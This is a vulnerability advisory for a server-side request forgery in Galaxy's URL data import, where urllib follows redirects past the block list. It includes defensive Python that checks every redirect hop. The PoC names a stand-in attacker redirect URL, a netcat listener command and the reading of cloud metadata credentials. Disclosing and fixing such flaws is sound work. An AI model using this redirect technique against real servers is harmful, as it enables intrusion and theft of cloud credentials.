Summary
A server-side request forgery (SSRF) which allows a malicious user to issue arbitrary HTTP/HTTPS requests from the application server to internal hosts and read their responses.
Details
During a data import, users can specify a URL from which to import data. After the user attempts the import, the URL is parsed as per:
This parses the URL to obtain its host name as well as its port number; the parsed URL is then compared against the entries in the block list. If the host name equals any IP address in the block list, access is denied. For example, private addresses such as 127.0.0.1 and 169.254.169.254 are denied.
The Galaxy server uses Python-urllib/3.7 to make HTTP/HTTPS requests when importing data from a URL. By default urllib follows any HTTP/HTTPS redirects, which allows an attacker to bypass the current security check by using a PHP redirect: the block list is applied only to the URL the user submitted, not to the host the redirect points at.
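The defensive fix for this class of bypass is to re-apply the resolve-then-block-list check to every redirect target, not just the submitted URL. The following Python is an added example, not Galaxy's own code: it wraps urllib's HTTPRedirectHandler so each hop is validated before being followed, and it goes slightly beyond the text by unwrapping IPv4-mapped IPv6 literals and failing closed on unresolvable hosts. BLOCKED_NETWORKS, the pluggable resolver and the TEST-NET addresses are assumptions.

```python
import ipaddress
import socket
import urllib.request
from urllib.error import HTTPError
from urllib.parse import urlsplit
# Address ranges an import URL must never reach (assumed list; extend to fit the deployment).
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "0.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10")]

def resolve_host(host):
    """Every address string the host resolves to; an IP literal resolves to itself."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def url_is_blocked(url, resolver=resolve_host):
    """True unless the URL is http(s) and every address of its host is outside BLOCKED_NETWORKS."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return True
    try:
        addrs = {ipaddress.ip_address(raw) for raw in resolver(parts.hostname)}
        addrs = {getattr(a, "ipv4_mapped", None) or a for a in addrs}  # ::ffff:127.0.0.1 -> 127.0.0.1
    except (OSError, ValueError):
        return True  # unresolvable or malformed host: fail closed
    return any(addr in net for addr in addrs for net in BLOCKED_NETWORKS)

class RedirectValidatingHandler(urllib.request.HTTPRedirectHandler):
    """Applies the block list to every redirect target, not only to the URL the user submitted."""
    def __init__(self, resolver=resolve_host):
        super().__init__()
        self.resolver = resolver
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        if url_is_blocked(newurl, self.resolver):
            raise HTTPError(newurl, code, "redirect to a blocked address refused", headers, fp)
        return super().redirect_request(req, fp, code, msg, headers, newurl)

def open_import_url(url, resolver=resolve_host, timeout=10):
    """Fetch a user-supplied import URL, checking the initial URL and then each redirect hop."""
    if url_is_blocked(url, resolver):
        raise ValueError("import URL refused: %s" % url)
    return urllib.request.build_opener(RedirectValidatingHandler(resolver)).open(url, timeout=timeout)

def redirect_allowed(newurl, resolver=resolve_host):
    """Offline check of the handler: would a 302 from a constructed public page to newurl be followed?"""
    req = urllib.request.Request("http://203.0.113.10/start")  # constructed origin (TEST-NET-3)
    try:
        RedirectValidatingHandler(resolver).redirect_request(req, None, 302, "Found", {}, newurl)
    except HTTPError:
        return False
    return True
```

Note that urllib resolves the host again when it connects, so a resolver whose answers change between the check and the connection is still a gap this check alone does not close.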
PoC
Firstly, on the Galaxy server start a netcat listener using the following command (this is used to show that the HTTP request is being redirected to localhost):
nc -lnvvp 9000
Next, as the attacker, host the following PHP script where it can be accessed publicly:
Then log on to the Galaxy site and select the upload button.
Lastly, paste in the URL where your PHP script is hosted and click import:
e.g. http://attacker.net/redirect.php
If you go back to your terminal you will see that the netcat listener received a request.
It is also possible to redirect to the AWS metadata endpoint and read the AWS credentials, and likewise on Alibaba Cloud instances. This does not affect Google Cloud/Microsoft Azure, as those require specific headers to be present.
Impact
An attacker is able to issue arbitrary HTTP/HTTPS requests to internal hosts and read their responses.
Proof-of-Concept:
Recording.2023-08-14.115701.mp4